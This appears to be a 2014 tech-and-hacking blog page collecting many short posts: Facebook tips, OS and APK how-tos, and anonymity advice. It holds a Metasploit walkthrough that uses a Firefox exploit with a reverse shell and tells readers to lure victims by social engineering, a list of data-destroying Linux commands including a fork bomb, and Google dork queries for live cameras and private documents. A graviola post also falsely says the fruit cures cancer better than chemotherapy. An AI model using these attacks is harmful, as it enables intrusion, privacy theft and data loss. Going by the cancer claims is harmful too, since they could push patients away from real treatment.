Sunday, November 30, 2014

20 Facebook Tips And Tricks You Should Know

 

20 Facebook Tips And Tricks You Should Know ======================================== ******************************************************************* +++++++++++++++++++++++++++++++++++++++ 1. Connect To Multiple Facebook Accounts You probably noticed that you can’t login to more than one account on Facebook. However, if you use Chrome, there is a built-in profile feature that allows you to create a new user profile on your browser. Click on the Navicon on the top right of your Chrome browser. Go to Settings. Go to Users, and click on Add new user. Choose your Profile Picture and give a name for that user. Click on Create and a new Window will be opened. You can now login to your Facebook account as per user profile and easily switch between users at the top right corner (see below). This is available on Firefox as well. Connect To Multiple Facebook Account 2. Sync Facebook Calendar With Google Calendar If you use both Facebook Calendar and Google Calendar to manage your everyday activities, you will need some time to manage both. Why not have your Facebook Events including birthday to sync with Google Calendar so that you don’t have to do it manually? Here’s how you can. Login to Facebook and click on Events. Go to the Calendar tab and click the Settings button on the top right then choose Export. You will see "export your friends birthdays" and "upcoming events" in a hyperlink; choose either one and copy the link address. Let’s say you pick birthdays first. Now, go to your Google Calendar page, look for Other Calendars on the left side of the page and click on the down arrow button then choose Add by URL. Paste the link you just copied in the URL box and click on Add Calendar. Repeat step 3 onwards with the events link to completely transfer all your events from the Facebook calendar to your Google calendar. Sync Facebook Calendar With Google Calendar 3. Accept All Friend Requests At Once If you have a lot of pending friend requests list, you might find its tiring to accept all the requests one at a time. Apparently there is a way to accept all at once using a JavaScript code. At your friend requests page, make sure to have all the requests loaded by scrolling down the page until the end. Next, copy this JavaScript code: javascript:for( i = 1;i<document.getElementsByName("actions[accept]").length;i++){document.getElementsByName("actions[accept]")[i].click();}void(0); and paste it in the address bar of your friend requests page. Make sure to manually add javascript: at the front of the code once you have pasted it in the address bar because some browsers will automatically remove that line. Press Enter and watch the magic happens. Accept All Friend Requests At Once 4. Create Special "Via" Status (With Logo) Normally when we update our Facebook status with our smartphone, the status will also include via "your device name" at the bottom of the status update. Instead of this being just for devices, you can change it to anything you can think of. Just follow the instructions here to customize the "via" status of your Facebook post. this. Create Your Own Post 'Via' status With Logo 5. Stop Facebook From Tracking You Yes, Facebook tracks whatever you do on the main site or on sites that use Facebook Connect. That is why you are being served ads that are relevant to information you have recently searched for. Creepy, isn’t it? There is a way to regain some form of privacy for yourself, with a Chrome plugin called Facebook Disconnect. Facebook Disconnect uses JavaScript to disable Facebook component link traffic from being accessed by third-party sites. Once installed, this plugin works without further tinkering. Stop Facebook From Tracking You 6. Photo Zoom For Facebook With Photo Zoom you can view any photo updates on Facebook in a larger size on your timeline simply by hovering your mouse over it. Get the Chrome extension here. Photo Zoom for Facebook 7. Hide Last Name On Facebook Facebook needs you to declare your first and last name, that’s two names, but if you want to have your account bear only one name (or just your first name), you can. Indonesians can register an account with only one name since many of them actually go with just one name. So for you to have a single name like Neo here, check out the instructions below. Login to your Facebook account. Grab any Indonesian proxy from this list here then change your proxy on your browser. On Chrome for PC head to Settings > Show advanced settings > under Network, click on Change proxy settings > click on Lan Settings and tick "Use Proxy Server for your LAN". Fill in the address box with the proxy, and the port box accordingly. For example, if your proxy is 180.250.160.58:8080, "180.250.160.58" goes into the address box and "8080" is the port. Tick on Bypass Proxy Server For Local Addresses. Press OK. Now, go to your Facebook Account settings page, change the language to "Bahasa Indonesia" and save changes. Remove your Facebook last name and save changes again. Once you have complete everything, revert to your original language. Hide Last Name on Facebook 8. Create Fake Facebook Status Conversation Have you ever read about how World War II transpired on Facebook and the drama Avengers wreaked on Facebook? Well, those conversations are made possible with The Wall Machine. It’s a tool that allows you to forge status updates, comments, likes, recent activity, relationship update, and event attendance, with fake accounts and profile pictures as well. Create Fake Facebook Conversation 9. Turn Off Facebook Notification Sounds So you congratulated a friend on a wedding or new baby, or sent a get well soon note to a sickly friend, and now the Facebook notifications won’t stop coming. You have forgotten that Facebook notifications come with sounds and wish you could turn it off. Here’s how to stop it from making noise. Head over to Facebook Account Settings > go to Notifications tab At the top, untick "Play a sound when each new notification is received" and Save Changes. Turn Off Facebook Notification Sounds 10. Joint Facebook Profile And Cover Image Want to have your own creative Facebook covers? How about one of those where the profile picture is part of the cover photo? Use Tricked Out Timeline website to create your very own joined Facebook profile and cover image. There are 4 effects that you can choose starting from Merge Profile & Cover photo, Missing Jigsaw Piece, Tear Off The Bottom Edge, and Profile Picture Zoom. Joint Facebook Profile and Cover Image 11. Download Facebook History Do you know that you can download your entire Facebook history and have it all compiled in a zip file? Go to the Facebook Account Settings page, under the General tab, near the bottom is a link to "Download a copy of your Facebook data". The archive includes almost everything from photos to your chat history but if you want a detailed breakdown read here. Download Facebook History 12. Use Profile Picture As Emoticons Did you know that you can turn your friend’s profile pictures into emoticons and use them in a Facebook chat? Here’s how to set it up. First, visit the page of your friend you want to tag as an emoticon. Then look for their Facebook username or their Profile ID from the address bar link. For example you want to get hongkiatcom from "https://www.facebook.com/hongkiatcom". In any Facebook chat, when you type [[hongkiatcom]], brackets included, the profile picture will show during the chat. You can do this more than once in the same chat, and your friend(s) will not be notified when you use their profile picture as an emoticon in your chats. Use Profile Picture As Emoticons 13. Invite All Friends To A Facebook Event Instead of inviting your friends one by one to your Event or Facebook page, why not have them invited all at once? It is as easy as copy pasting a JavaScript code. Go to your Event Facebook page and click on Invite friends. Scroll down your friend list until the end to ensure you have loaded all the friends you want to invite. On Chrome, press CTRL + SHIFT + J (Windows) or CMD + Opt + J (Mac). Copy and paste this javascript:elms=document.getElementsByName("checkableitems[]");for (i=0;i<elms.length;i++){if (elms[i].type="checkbox" )elms[i].click()} followed by an Enter in the console space. You will then see all your friends name automatically ticked. invite All Friends to a Facebook Event 14. Download Facebook Videos Unlike Google+, Facebook does not include a feature to download the videos you see on the social network. Well, there is a really easy way to download your own copy. Simply go to this page, and paste that specific Facebook video URL to download the video. Download Facebook Videos 15. Enhance Your Facebook Experience With Social Fixer Want to customize Facebook to look exactly the way you want? Get rid of ads, change it to a previous layout, hide already read posts, force news feeds to "recent stories first" and a whole lot more with Social Fixer plugin. Enhance Your Facebook Experience With Social Fixer 16. Display Animated Gifs On Status Update With A Play Button Why aren’t animated gifs on Facebook yet? With giphy gifs it already is. Just find a gif that you want from giphy.com then share the link at your Facebook page. Display Animated Gifs On Status Update With A Play Button 17. Login To Facebook With Your Username Or Phone Numbers You know you need your email address to login to your Facebook but did you know you can also gain access with your username or phone number as well? If you don’t have a username yet, visit this link to create one. Login Facebook With Your Username or Phone Numbers 18. Share Facebook Statuses With Profile Pictures And Names Blurred Out Want to share a Facebook status but want to blur out profile pictures and sensitive names? Use Status Snapper for the job since it will automatically blur out the user name and profile image. The image wil also be automatically uploaded to imgur. Share Facebook Statuses With Profile Picture and Name Blur out 19. Removing Bitstrips From Your News Feed A viral app that you probably have seen at least once in your Facebook News feed is Bitstrips. Through Bitstrips you can create your own comics starring you or any of your friends. Its a fun idea, but to some Facebook user, Bitstrips is probably taking way to much space on their feeds. If you want to eradicate Bitstrips from your feed, we got your back. What is Bitstrips & How to remove them From Your News Feed 20. Facebook Keyboard Shortcuts So there are keyboard shortcuts on Google+, and also on YouTube, it’s no surprise that Facebook has their own set of keyboard shortcuts as well. Here are some Facebook keyboard shortcuts that you can use while browsing Facebook on Chrome for Mac. Shortcuts Descriptions Ctrl + Opt + 0 Help Ctrl + Opt + 1 Home Ctrl + Opt + 2 Timeline Ctrl + Opt + 3 Friends Ctrl + Opt + 4 Inbox Ctrl + Opt + 5 Notifications Ctrl + Opt + 6 Account Settings Ctrl + Opt + 7 Privacy Ctrl + Opt + 8 About Ctrl + Opt + 9 Terms Ctrl + Opt + M New Message C Comment on a story in News Feed J and K Scroll between News Feed stories I Like or unlike a selected story Q Search for a friend to chat with P Focus on the text box when making a post / Search Ctrl + G Search conversations Ctrl + Q Show/hide keyboard shortcuts Ctrl + Delete Archive/unarchive conversations Ctrl + C Mark as spam Ctrl + C Start a new message Ctrl + I Go to inbox Ctrl + U Go to other Check out all our other posts

Thirty competition like Facebook penetration method

Thirty competition like Facebook penetration method https://www.youtube.com/watch?v=SynOtxdW4wk&list method of zikr page https://www.youtube.com/watch?v=1IA9sNr4Oa4&list how close any Facebook account https://www.youtube.com/watch?v=x9NWORM7Bf0&list how to protect world Facebook hack Agua by garrison Facebook https://www.youtube.com/watch?v=N0NWklAbHWE&list method close account Facebook at phone number https://www.youtube.com/watch?v=x__oRS3sCVE&list a Russian what email bnhadar Facebook https://www.youtube.com/watch?v=c8Xpwpzy2SQ&list Facebook account opening way to Labado akhbtar photo https://www.youtube.com/watch?v=_D5_LLrfgpQ&list a way to avoid closing a Facebook identity is the identity of the image never https://www.youtube.com/watch?v=swM9aT8gpfw&list tigik workings of Facebook account without asking you to phone number https://www.youtube.com/watch?v=gOdaOwd8Ksw&list way to increase the number of fans of Facebook pages more than 20,000 fans every day the first method: Https://www.youtube.com/watch?v=Hm7l3mNB_WQ&list method 2: https://www.youtube.com/watch?v=va6dHzc-3L4&list altarithh 3: https://www.youtube.com/watch?v=_yPeesaDC64&list way to change name on Facebook after five times exceeds the https://www.youtube.com/watch?v=8CXwW2i7lJ4&list way to present requests for friendship in Facebook https://www.youtube.com/watch?v=r38235m42xE&list method avoiding urban requests friendship on Facebook with just one click https://www.youtube.com/watch?v=ytadMvNt8s8&list way to increase the number of friends on Facebook to 5000 friend from any country of your choice https://www.youtube.com/watch?v=RBSwXB4LZSM&list penetration aloirls: https://www.youtube.com/watch?v=C7ynbvFj5ko&list my channel: https://www.youtube.com/channel/UChd5qvl_qsq1JTxAQOqBihw my page: https://www.facebook.com/school.hakar

Thirty competition like Facebook penetration method https://www.youtube.com/watch?v=SynOtxdW4wk&list method of zikr page https://www.youtube.com/watch?v=1IA9sNr4Oa4&list how close any Facebook account https://www.youtube.com/watch?v=x9NWORM7Bf0&list how to protect world Facebook hack Agua by garrison Facebook https://www.youtube.com/watch?v=N0NWklAbHWE&list method close account Facebook at phone number https://www.youtube.com/watch?v=x__oRS3sCVE&list a Russian what email bnhadar Facebook https://www.youtube.com/watch?v=c8Xpwpzy2SQ&list Facebook account opening way to Labado akhbtar photo https://www.youtube.com/watch?v=_D5_LLrfgpQ&list a way to avoid closing a Facebook identity is the identity of the image never https://www.youtube.com/watch?v=swM9aT8gpfw&list tigik workings of Facebook account without asking you to phone number https://www.youtube.com/watch?v=gOdaOwd8Ksw&list way to increase the number of fans of Facebook pages more than 20,000 fans every day the first method: Https://www.youtube.com/watch?v=Hm7l3mNB_WQ&list method 2: https://www.youtube.com/watch?v=va6dHzc-3L4&list altarithh 3: https://www.youtube.com/watch?v=_yPeesaDC64&list way to change name on Facebook after five times exceeds the https://www.youtube.com/watch?v=8CXwW2i7lJ4&list way to present requests for friendship in Facebook https://www.youtube.com/watch?v=r38235m42xE&list method avoiding urban requests friendship on Facebook with just one click https://www.youtube.com/watch?v=ytadMvNt8s8&list way to increase the number of friends on Facebook to 5000 friend from any country of your choice https://www.youtube.com/watch?v=RBSwXB4LZSM&list penetration aloirls: https://www.youtube.com/watch?v=C7ynbvFj5ko&list my channel: https://www.youtube.com/channel/UChd5qvl_qsq1JTxAQOqBihw my page: https://www.facebook.com/school.hakar

How to build own Operating System..

 

How to build own Operating System.. ================================ You might be using Windows,LINUX or Mac Operating System from very long. Ever wondered how these Operating System are made ? Or Ever think of making own Operating System ?? The Operating System you are going to create online will be Linux Operating System. There is no technical skills required for creating an own Linux Operating System online. Linux is a kernel, which can be used to create Operating Systems. Operating System(s) created by using Linux kernel are called Linux Operating System(s). Example of Linux Operating Systems are Ubuntu and SUSE To create own Operating System you don’t need to be a computer master or a programmer, all you need is a website: SUSE Studio. Yes, you can create your own Operating System online from ---> www. susestudio .com www. susestudio .com Sign in with your account, have to select a base package and desktop environment, 32 bit or 64 bit and then have to customize it like Logo, Soft-wares etc. once you have created your Own Linux Operating System you have to click on build and have to download an ISO image. You can burn this ISO image in a CD/DVD and can use that CD/DVD to install your own Operating System, just like you do with Windows or Linux CD......

To make an account on Facebook to avoid closing http://youtu.be/OD17S6p4BlI

To make an account on Facebook to avoid closing http://youtu.be/OD17S6p4BlI

To make an account on Facebook to avoid closing http://youtu.be/OD17S6p4BlI

5 Deadly linux commands that can Destroy one System 5 Deadly

 

5 Deadly linux commands that can Destroy one System 5 Deadly linux commands that can Destroy one System 1. Command > rm -rf / = It will Delete Everything Explanation : It is a combination of three keywords. First is : rm It will remove all the files followed by this command. Second is : -rf This will run rm command in more effective way and will remove everything ( all files and folders inside the specified folder )without asking confirmation from the user. Third is : / This will start removing the data from the root directroy and will delete everything from the computer including the data of removable media. 2. Command > ){ :|: & };: = Shell function that gets repliacated. This command creates a shell function , which once get initialized starts to create multiple copies of itself.It results in taking quickly all the memory and power of CPU.It makes computer freeze or not responding. This is also known as Denial Of Service Attack. 3. Command > mkfs.ext4 /dev/sda1 = This command will format the hard disk Explanation : This command is again composed of two keywords. First is : mkfs.ext4 : This part of command will create a new ext4 file system on following device where this command will get executed. Second is : /dev/sda1 ;This part of command specifies the 1st partition on the first hard disk which is probably in use by the user. Similarly, This Command > mkfs.ext3 /dev/sdb2 will Format the second partition on the second hard disk with ext3 File system. 4. Command > /dev/sda – Write Any content Directly to a Hard Drive. Explanation : This command will execute normally as other commands in linux do. But output of this command will directly be sent to the file system (NTFS or FAT ) of the Hard Drive. It will result into damaging the file system of the computer. 5. Command > mv ~ /dev/null – Beware it Will Move your Home Directory To Black hole. Explanation : Moving any of your content and data to following path : /dev/null means you want to destroy it. It means /dev/null is a black hole where once anything sent , can not be recovered back. Note:Many of these commands will only be dangerous if they’re prefixed with sudo on Ubuntu – they won’t work otherwise. On other Linux distributions, most commands must be run as root.

Lock Your Computer on Mouse Click (Just Press Windows +L)

 

Lock Your Computer on Mouse Click (Just Press Windows +L) OR Just Follow the simple step >> 1. Right click an empty spot on the desktop, point to New and click Shortcut. 2. In the Create Shortcut dialog box, type the following in the 'Type the location' of the item text box: rundll32 user32.dll,LockWorkStation 3. Click Next 4. In "Type a name for this shortcut", type "" (any name as u wish) and Click Finish 5. This will Create a shortcut in your Desktop. 6.Now each time when you want to lock the computer , Just click on this shortcut.

Saturday, November 29, 2014

How to download an APK from Google Play using a website

 

How to download an APK from Google Play using a website. If you're a much more casual APK downloader then a Chrome extension is probably not really necessary. Instead, you can just visit a dedicated site for generating APK download links whenever you need to. 1. Go to the Play Store and find the app you want to download. 2. Copy the app's package ID. 3. Go to a site like Evozi's APK Downloader http:// apps.evozi.com/apk-downloader/ (Evozi also has a Chrome/Firefox extension) and paste the app package name (or the whole Google Play URL if you're lazy) in the box at the top of the page. You can simply generate unique download links every time you want to grab an APK. © Evozi 4. Hit the blue button to generate the download link and save it to your computer. 5. Feel free to confirm the version number with that on Google Play and do an MD5 file check if you're at all paranoid about what you're getting. 6. Run a virus scan on the file too if that makes you feel better. 7. Sideload the APK to your phone/tablet and install it as above.

Hack Remote Windows

 

Hack Remote Windows, Linux or MAC PC using Firefox WebIDL Privileged Javascript Injection This exploit gains remote code execution on Firefox 22-27 by abusing two separate privilege escalation vulnerabilitiesin Firefox’s Javascript APIs Exploit Targets Firefox 22-27 Windows XP SP 3 Windows 7 Linux OSX Requirement Attacker: kali Linux Victim PC: Windows 7 Open Kali terminal type msfconsole Now type use exploit/multi/browser/firefox_webidl_injection msf exploit (firefox_webidl_injection)>setpayload firefox/shell_reverse_tcp msf exploit (firefox_webidl_injection)>setlhost 192.168.0.5 (IP of Local Host) msf exploit (firefox_webidl_injection)>setsrvhost 192.168.0.5 msf exploit (firefox_webidl_injection)>seturipath / msf exploit (firefox_webidl_injection)>exploit Now an URL you should give to your victim http://192.168.0.5:8080 Send the link of the server to the victim via chat or email or any social engineering technique Now you have access to the victims PC. Use “sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID“ Enjoy

Friday, November 28, 2014

How to download an APK from Google Play

 

How to download an APK from Google Play using a website. BY ‪#‎THE_HJ‬ If you're a much more casual APK downloader then a Chrome extension is probably not really necessary. Instead, you can just visit a dedicated site for generating APK download links whenever you need to. 1. Go to the Play Store and find the app you want to download. 2. Copy the app's package ID. 3. Go to a site like Evozi's APK Downloader http://apps.evozi.com/apk-downloader/ (Evozi also has a Chrome/Firefox extension) and paste the app package name (or the whole Google Play URL if you're lazy) in the box at the top of the page. You can simply generate unique download links every time you want to grab an APK. © Evozi 4. Hit the blue button to generate the download link and save it to your computer. 5. Feel free to confirm the version number with that on Google Play and do an MD5 file check if you're at all paranoid about what you're getting. 6. Run a virus scan on the file too if that makes you feel better. 7. Sideload the APK to your phone/tablet and install it as above.

https://www.youtube.com/watch?v=QIrXVXVV_G8

https://www.youtube.com/watch?v=QIrXVXVV_G8

Google as A Hacking Tool

 

Google as A Hacking Tool Global search engine giant Google is priceless. We use it on a more than daily basis for all our search needs. Whether you're looking for that fancy word or the location of a good restaurant, you'll get everything with Google search and more. Enough on the good part. Did you know Google has a dark side too? Did you know Google can be used to gain access to confidential information or download free music? Here's how... 1.Hacking Security Cameras! You might have noticed many security cameras monitoring places like parking lots, college campus, road traffic etc (and yes, some of them work!). Did you know you can use Google to hack into these cameras to view images captured by these cameras in real time. How do you do it? Well simply open the Google search box and type in the following query: inurl:”viewerframe?mode=motion” You will get a search result that will give you access to live cameras with full controls (move the camera in all the four directions, perform zoom in and zoom out). The above mentioned query usually gives access to cameras with less refresh rate. In case you're looking for faster refresh rates: intitle:”Live View / – AXIS” 2. Hacking Personal and Confidential Documents! You can access an email repository containing personal and confidential documents (CVs for instance) using Google. Simply open the Google search box and type in the following query: intitle:”curriculum vitae” “phone * * *” “address *” “e-mail” To access a list of excel documents which contains contact details including email addresses of people: filetype:xls inurl:”email.xls” To access documents potentially containing information on bank accounts, financial summaries and credit card numbers: intitle:index.of finances.xls 3. Gaining Access to Free Stuffs! If you're looking to download free music, simply enter the following query on Google search box and hit enter: “?intitle:index.of?mp3 artist name“ If you're looking to download free ebooks: “?intitle:index.of?pdf book name“ ATTENTION PLZ: Support The Page By Like, Share, Comments! Tnx

Want to be anonymous online to view blocked websites

 

Want to be anonymous online to view blocked websites, protect your self from hackers or want to hack some one and stay un-traced?. In the following post i will explain 4 easy ways by which you can stay anonymous online! ---------------------------------- 1. Using Proxies A proxy is an address ( IP address ) of a Server (proxy server) that is placed between your computer and the Internet The advantage of a proxy is that your real IP address is Hidden so when you hack your giving the IP address of the proxy sever and not your real IP address Same way if your a normal Internet user the hacker won't get your real IP but the IP of the proxy server.You can use it to enter site or forum that you are IP is banned. To know more about proxies les me know above this post and I will post a full tutotial about it. 2. Using Tor Tor-proxy is a free proxy-server service that Internet users can use to hide their IP address while surfing the Web. Tor (The Onion Router) is free software for enabling online anonymity. Tor directs Internet traffic through a free, worldwide volunteer network consisting of more than three thousand relays to conceal a user's location or usage from anyone. I have written a complete How to guide on how to use tor - just let me know if you need it 3. SSH Tunneling SSH tunnel is an encrypted tunnel created through an SSH protocol connection. SSH tunnels may be used to tunnel unencrypted traffic over a network through an encrypted channel.In easy language,you can surf net without being monitored and even surf blocked sites too. To know more about SSH and SSH tunneling let me know if you would like to read: SSH tunneling guide. 4. Using VPN Virtual Private Network. Basically it’s a private network which lets users to connect to other users or remote sites using a public network usually internet. It uses “virtual” connections routed through the Internet from the company’s private network to the remote site or employee instead of physical connections. In short, it is private network constructed within a public network infrastructure, such as the global Internet. The Biggest difference between proxy and VPN is everything in a VPN is encrypted which gives an additional layer of security.

Thursday, November 27, 2014

"SHARE THIS INFORMATION FIRST AND READ AFTERWARDS.....SAVE LIFE

 

"SHARE THIS INFORMATION FIRST AND READ AFTERWARDS.....SAVE LIFE Share this as much as you can. "10000 times stronger killer of CANCER than Chemo".. do share it.. can save many lives, fill up hopes and build confidence in the patients... The Sour Sop or the fruit from the graviola tree is a miraculous natural cancer cell killer 10,000 times stronger than Chemo. ... Why are we not aware of this? Its because some big corporation want to make back their money spent on years of research by trying to make a synthetic version of it for sale. So, since you know it now you can help a friend in need by letting him know or just drink some sour sop juice yourself as prevention from time to time. The taste is not bad after all. It’s completely natural and definitely has no side effects. If you have the space, plant one in your garden. The other parts of the tree are also useful. The next time you have a fruit juice, ask for a sour sop. How many people died in vain while this billion-dollar drug maker concealed the secret of the miraculous Graviola tree? This tree is low and is called graviola ! in Brazi l, guanabana in Spanish and has the uninspiring name “soursop” in English. The fruit is very large and the subacid sweet white pulp is eaten out of hand or, more commonly, used to make fruit drinks, sherbets and such. The principal interest in this plant is because of its strong anti-cancer effects. Although it is effective for a number of medical conditions, it is its anti tumor effect that is of most interest. This plant is a proven cancer remedy for cancers of all types. Besides being a cancer remedy, graviola is a broad spectrum antimicrobial agent for both bacterial and fungal infections, is effective against internal parasites and worms, lowers high blood pressure and is used for depression, stress and nervous disorders. If there ever was a single example that makes it dramatically clear why the existence of Health Sciences Institute is so vital to Americans like you, it’s the incredible story behind the Graviola tree.. The truth is stunningly simple: Deep within the Amazon Rainforest grows a tree that could literally revolutionize what you, your doctor, and the rest of the world thinks about cancer treatment and chances of survival. The future has never looked more promising. Research shows that with extracts from this miraculous tree it now may be possible to: * Attack cancer safely and effectively with an all-natural therapy that does not cause extreme nausea, weight loss and hair loss * Protect your immune system and avoid deadly infections * Feel stronger and healthier throughout the course of the treatment * Boost your energy and improve your outlook on life The source of this information is just as stunning: It comes from one of America ‘s largest drug manufacturers, th! e fruit of over 20 laboratory tests conducted since the 1970's! What those tests revealed was nothing short of mind numbing… Extracts from the tree were shown to: * Effectively target and kill malignant cells in 12 types of cancer, including colon, breast, prostate, lung and pancreatic cancer.. * The tree compounds proved to be up to 10,000 times stronger in slowing the growth of cancer cells than Adriamycin, a commonly used chemotherapeutic drug! * What’s more, unlike chemotherapy, the compound extracted from the Graviola tree selectivelyhunts down and kills only cancer cells.. It does not harm healthy cells! The amazing anti-cancer properties of the Graviola tree have been extensively researched–so why haven’t you heard anything about it? If Graviola extract is One of America ‘s biggest billion-dollar drug makers began a search for a cancer cure and their research centered on Graviola, a legendary healing tree from the Amazon Rainforest. Various parts of the Graviola tree–including the bark, leaves, roots, fruit and fruit-seeds–have been used for centuries by medicine men and native Indi! ans in S outh America to treat heart disease, asthma, liver problems and arthritis. Going on very little documented scientific evidence, the company poured money and resources into testing the tree’s anti-cancerous properties–and were shocked by the results. Graviola proved itself to be a cancer-killing dynamo. But that’s where the Graviola story nearly ended. The company had one huge problem with the Graviola tree–it’s completely natural, and so, under federal law, not patentable. There’s no way to make serious profits from it. It turns out the drug company invested nearly seven years trying to synthesize two of the Graviola tree’s most powerful anti-cancer ingredients. If they could isolate and produce man-made clones of what makes the Graviola so potent, they’d be able to patent it and make their money back. Alas, they hit a brick wall. The original simply could not be replicated. There was no way the company could protect its profits–or even make back the millions it poured into research. As the dream of huge profits evaporated, their testing on Graviola came to a screeching halt. Even worse, the company shelved the entire project and chose not to publish the findings of its research! Luckily, however, there was one scientist from the Graviola research team whose conscience wouldn’t let him see such atrocity committed. Risking his career, he contacted a company that’s dedicated to harvesting medical plants from the Amazon Rainforest and blew the whistle. Miracle unleashed When researchers at the Health Sciences Institute were alerted to the news of Graviola,! they be gan tracking the research done on the cancer-killing tree. Evidence of the astounding effectiveness of Graviola–and its shocking cover-up–came in fast and furious…. ….The National Cancer Institute performed the first scientific research in 1976. The results showed that Graviola’s “leaves and stems were found effective in attacking and destroying malignant cells.” Inexplicably, the results were published in an internal report and never released to the public… ….Since 1976, Graviola has proven to be an immensely potent cancer killer in 20 independent laboratory tests, yet no double-blind clinical trials–the typical benchmark mainstream doctors and journals use to judge a treatment’s value–were ever initiated…. ….A study published in the Journal of Natural Products, following a recent study conducted at Catholic University of South Korea stated that one chemical in Graviola was found to selectively kill colon cancer cells at “10,000 times the potency of (the commonly used chemotherapy drug) Adriamycin…” ….The most significant part of the Catholic University of South Korea report is that Graviola was shown to selectively target the cancer cells, leaving healthy cells untouched. Unlike chemotherapy, which indiscriminately targets all actively reproducing cells (such as stomach and hair cells), causing the often devastating side effects of nausea and hair loss in cancer patients. …A study at Purdue University recently found that leaves from the Graviola tree killed cancer cells among six human cell lines and were especially effective against prostate, pancreatic and lung cancers Seven years of silence broken–it’s finally here!!! To get latest update from Nigeriacamera click like on our wall page and stay connected Read latest Story and News direct from source @ www.nigeriacamera.net

" Dintii catre limba :

 

" Dintii catre limba : -Daca te presam putin mai tare, te puteam taia. Limba : -O singura injuratura daca soptesc unei persoane, zburati toti din gura. "

SteamOS is a Debian

 

SteamOS is a Debian GNU/Linux-based operating system in development by Valve Corporation designed to be the primary operating system for the Steam Machine game consoles.And it is designed primarily for playing video games. Users will be able to stream games from their Windows or Mac computers to one running SteamOS, and it will incorporate the same familysharing and restrictions as Steam on the desktop. Valve claims that it has “achieved significant performance increases in graphics processing” through SteamOS. The operating system is open source allowing anyone to buildon or adapt the source code. Since SteamOS is designed for playing games it does not have many built-in functions beyond web browsing and playing games; for example there is no file manager or image viewer installed by default. Users can, however, install other software by using the inbuilt GNOME desktop environment. Though the OS does not, in its current form, support streaming services, Valve is in talks with streaming companies to bring the feature to SteamOS. The OSdoes not currently support AMD or Intel graphics cards and so requires an Nvidia one. What are the SteamOS Hardware Requirements? Processor: Intel or AMD 64-bit capable processor Memory: 4GB or more RAM Hard Drive: 500GB or larger diskVideo Card: NVIDIA graphics card(AMD and Intel graphics support coming soon!) Additional: UEFI boot supportUSB port for installation The next question will be how you can install it in your computer Right . There are two methods for installation, but both will erase entire your hard disk ,so you have to take care aboout that,Default InstallationYou will need to create a SteamOS System Restore USB stick to perform this install. The image provided here requires atleast a 1TB disk. 1.Download the default SteamOS beta installation(http://store.steampowered.com/steamos/download/?ver=default) 2.Format a 4GB or larger USB stick with the FAT32 filesystem.Use “SYSRESTORE” as the partition name. 3.Unzip the contents of SYSRESTORE.zip to this USB stick to create the System Restore USB stick. 4.Put the System Restore USB stick in your target machine. Boot your machine and tell the BIOS to boot off the stick. (usually something like F8, F11 or F12 will bring up the BIOS boot menu). 5.Make sure you select the UEFI entry, it may look something like “UEFI: Patriot Memory PMAP”. If there is no UEFI entry, you may need to enable UEFI support in your BIOS setup. 6.Select “Restore Entire Disk” from the GRUB menu. 7.When it is complete it will shutdown. Power on the machine to boot into your freshly re-imaged SteamOS. Custom Installation The second method is based on the Debian Installer. It requires multiple configuration steps: 1.Download the custom SteamOS beta installation(http://store.steampowered.com/steamos/download/?ver=default) 2.Unzip the SteamOS.zip file to a blank, FAT32-formatted USB stick. 3.Put the USB stick in your target machine. Boot your machine and tell the BIOS to boot off the stick. (usually something like F8, F11, or F12 will bring up the BIOS boot menu). 4.Make sure you select the UEFI entry, it may look something like “UEFI: Patriot Memory PMAP”. If there is no UEFI entry, you may need to enable UEFI support in your BIOS setup. 5.Selected “Automated install” from the menu. 6.The rest of the installation is unattended and will repartition the drive and install SteamOS. 7.After installation is complete, log onto the resulting system (using the Gnome session) withthe predefined “steam” account. The password is “steam”. Run steam, accept the EULA, and let it bootstrap. Logoff the steam account. 8.Log on with the “desktop” account. The password is “desktop”. 9.From a terminal window, run~/post_logon.sh. This will prompt for a password – enter “desktop”. This script will perform the post-install customizations, delete itself, then reboot into the recovery partition capture utility. 10.Confirm “y” to continue and the recovery partition will be created. When it is finished, reboot into your freshly installed SteamOS. But if you still face any difficulty then just Google it coz it is little bit complicated

gلا تنسى الاشتراك في القناة ليصلك كل جديد .

 

gلا تنسى الاشتراك في القناة ليصلك كل جديد . http://www.eh-academy.com/2014/11/7-blind-sql-injection.html

Wednesday, November 26, 2014

<bg=b0ff0000>

 

<bg=b0ff0000> <bg=b0ff0000> <bg=b0ff0000> <bg=b0ff0000> <bg=b0ff0000> <bg=b0ff0000> <bg=b0ff0000> <bg=b0ff0000> <bg=b0ff0000> <bg=b0ff0000> <bg=b0ff0000> <bg=b0ff0000> <bg=b0ff0000> <bg=b0ff0000> <bg=b0ff0000> <bg=b0ff0000> <bg=b0ff0000> <bg=b0ff0000> <bg=b0ff0000> <bg=b0ff0000> <bg=b0ff0000> <bg=b0ff0000> <bg=b0ff0000> <bg=b0ff0000> <bg=b0ff0000> <bg=b0ff0000> <bg=b0ff0000> <bg=b0ff0000> <bg=b0ff0000> <bg=b0ff0000> <bg=b0ff0000> <bg=b0ff0000> <bg=b0ff0000> <bg=b0ff0000> <bg=b0ff0000> <bg=b0ff0000> <bg=b0ff0000> <bg=b0ff0000> <bg=b0ff0000> <bg=b0ff0000> <bg=b0ff0000> <bg=b0ff0000> <bg=b0ff0000> <bg=b0ff0000> <bg=b0ff0000> <bg=b0ff0000> <bg=b0ff0000> <bg=b0ff0000> <bg=b0ff0000> <bg=b0ff0000> <bg=b0ff0000> <bg=b0ff0000> <bg=b0ff0000> <bg=b0ff0000> <bg=b0ff0000> <bg=b0ff0000><bg=b0ff0000> <bg=b0ff0000> <bg=b0ff0000> <bg=b0ff0000> <bg=b0ff0000> <bg=b0ff0000> <bg=b0ff0000> <bg=b0ff0000> <bg=b0ff0000> <bg=b0ff0000> <bg=b0ff0000> <bg=b0ff0000> <bg=b0ff0000> <bg=b0ff0000> <bg=b0ff0000> <bg=b0ff0000> <bg=b0ff0000> <bg=b0ff0000> <bg=b0ff0000><bg=b0ff0000> <bg=b0ff0000> <bg=b0ff0000> <bg=b0ff0000> <bg=b0ff0000> <bg=b0ff0000> <bg=b0ff0000> <bg=b0ff0000> <bg=b0ff0000> <bg=b0ff0000> <bg=b0ff0000> <bg=b0ff0000> <bg=b0ff0000> <bg=b0ff0000> <bg=b0ff0000> <bg=b0ff0000> <bg=b0ff0000> <bg=b0ff0000> <bg=b0ff0000> <bg=b0ff0000> <bg=b0ff0000> <bg=b0ff0000> <bg=b0ff0000> <bg=b0ff0000> <bg=b0ff0000> <bg=b0ff0000> <bg=b0ff0000> <bg=b0ff0000><bg=b0ff0000> <bg=b0ff0000> <bg=b0ff0000> 